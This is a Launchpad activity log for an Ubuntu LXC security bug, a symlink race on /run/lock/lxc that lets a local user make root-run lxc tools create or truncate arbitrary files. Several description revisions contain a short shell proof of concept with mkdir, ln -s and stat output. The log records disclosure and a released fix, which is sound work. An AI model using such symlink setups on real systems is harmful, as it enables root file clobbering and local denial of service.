Activity log for bug #1470842

Date Who What changed Old value New value Message
2015-07-02 12:46:33 Roman Fiedler bug added bug
2015-07-02 15:16:51 Tyler Hicks bug added subscriber Stéphane Graber
2015-07-02 15:16:59 Tyler Hicks bug added subscriber Serge Hallyn
2015-07-02 15:30:43 Tyler Hicks lxc (Ubuntu): status New Incomplete
2015-07-02 15:35:51 Tyler Hicks lxc (Ubuntu): status Incomplete Confirmed
2015-07-02 15:46:07 Tyler Hicks description
  Old value:
    When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.

    POC:
    # su -s /bin/bash nobody
    # mkdir -p lxc/var/lib/lxc
    # ln -s /etc/suid-debug lxc/var/lib/lxc/somename

    As root:
    lxc-info --name somename

    The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
  New value:
    When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.

    Arbitrary file creation PoC:
    $ mkdir -p /run/lock/lxc/var/lib/lxc
    $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
    $ stat /test
    stat: cannot stat ‘/test’: No such file or directory
    $ sudo lxc-create --name somename --template download # An admin would run this command
    ...
    Distribution: ubuntu
    Release: trusty
    Architecture: amd64
    ...
    $ stat /test
      File: ‘/test’
      Size: 0 Blocks: 0 IO Block: 4096 regular empty file
    Device: fd01h/64769d Inode: 52559 Links: 1
    Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
    Access: 2015-07-02 10:40:55.703646793 -0500
    Modify: 2015-07-02 10:40:55.703646793 -0500
    Change: 2015-07-02 10:40:55.703646793 -0500
     Birth: -

    Arbitrary file truncation PoC:
    TODO (Roman)

    The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-02 15:50:45 Marc Deslauriers cve linked 2015-1331
2015-07-02 16:19:29 Tyler Hicks bug added subscriber Ubuntu Security Team
2015-07-02 18:51:18 Tyler Hicks description
  Old value:
    When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.

    Arbitrary file creation PoC:
    $ mkdir -p /run/lock/lxc/var/lib/lxc
    $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
    $ stat /test
    stat: cannot stat ‘/test’: No such file or directory
    $ sudo lxc-create --name somename --template download # An admin would run this command
    ...
    Distribution: ubuntu
    Release: trusty
    Architecture: amd64
    ...
    $ stat /test
      File: ‘/test’
      Size: 0 Blocks: 0 IO Block: 4096 regular empty file
    Device: fd01h/64769d Inode: 52559 Links: 1
    Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
    Access: 2015-07-02 10:40:55.703646793 -0500
    Modify: 2015-07-02 10:40:55.703646793 -0500
    Change: 2015-07-02 10:40:55.703646793 -0500
     Birth: -

    Arbitrary file truncation PoC:
    TODO (Roman)

    The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
  New value:
    When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.

    PoC:
    $ mkdir -p /run/lock/lxc/var/lib/lxc
    $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
    $ stat /test
    stat: cannot stat ‘/test’: No such file or directory
    $ sudo lxc-create --name somename --template download # An admin would run this command
    ...
    Distribution: ubuntu
    Release: trusty
    Architecture: amd64
    ...
    $ stat /test
      File: ‘/test’
      Size: 0 Blocks: 0 IO Block: 4096 regular empty file
    Device: fd01h/64769d Inode: 52559 Links: 1
    Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
    Access: 2015-07-02 10:40:55.703646793 -0500
    Modify: 2015-07-02 10:40:55.703646793 -0500
    Change: 2015-07-02 10:40:55.703646793 -0500
     Birth: -

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-15 15:58:34 Tyler Hicks attachment added 0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+attachment/4429477/+files/0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch
2015-07-22 10:15:14 Roman Fiedler description
  Old value:
    When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.

    PoC:
    $ mkdir -p /run/lock/lxc/var/lib/lxc
    $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
    $ stat /test
    stat: cannot stat ‘/test’: No such file or directory
    $ sudo lxc-create --name somename --template download # An admin would run this command
    ...
    Distribution: ubuntu
    Release: trusty
    Architecture: amd64
    ...
    $ stat /test
      File: ‘/test’
      Size: 0 Blocks: 0 IO Block: 4096 regular empty file
    Device: fd01h/64769d Inode: 52559 Links: 1
    Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
    Access: 2015-07-02 10:40:55.703646793 -0500
    Modify: 2015-07-02 10:40:55.703646793 -0500
    Change: 2015-07-02 10:40:55.703646793 -0500
     Birth: -

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
  New value:
    During LXC security analysis (see [1]) it was found, that when lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container or automatic startup starting after boot starting one.

    PoC:
    $ mkdir -p /run/lock/lxc/var/lib/lxc
    $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
    $ stat /test
    stat: cannot stat ‘/test’: No such file or directory
    $ sudo lxc-create --name somename --template download # An admin would run this command
    ...
    Distribution: ubuntu
    Release: trusty
    Architecture: amd64
    ...
    $ stat /test
      File: ‘/test’
      Size: 0 Blocks: 0 IO Block: 4096 regular empty file
    Device: fd01h/64769d Inode: 52559 Links: 1
    Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
    Access: 2015-07-02 10:40:55.703646793 -0500
    Modify: 2015-07-02 10:40:55.703646793 -0500
    Change: 2015-07-02 10:40:55.703646793 -0500
     Birth: -

    # lsb_release -rd
    Description: Ubuntu 14.04.2 LTS
    Release: 14.04

    # apt-cache policy lxc
    lxc:
      Installed: 1.0.7-0ubuntu0.1
      Candidate: 1.0.7-0ubuntu0.1
      Version table:
     *** 1.0.7-0ubuntu0.1 0
            500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
            100 /var/lib/dpkg/status
         1.0.3-0ubuntu3 0
            500 http://archivexxx/ubuntu/ trusty/main amd64 Packages

    [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
2015-07-22 14:12:24 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:12:24 Launchpad Janitor cve linked 2015-1131
2015-07-22 14:12:24 Launchpad Janitor cve linked 2015-1334
2015-07-22 14:12:25 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:12:26 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:18:40 Tyler Hicks information type Private Security Public Security
2015-07-22 19:22:23 Tyler Hicks cve unlinked 2015-1131
2015-07-22 19:23:33 Tyler Hicks cve linked 2015-1131
2015-07-22 19:23:54 Tyler Hicks cve unlinked 2015-1334
2015-07-22 19:24:10 Tyler Hicks cve unlinked 2015-1331
2015-07-22 19:24:44 Tyler Hicks cve linked 2015-1331
2015-07-22 19:24:57 Tyler Hicks cve unlinked 2015-1131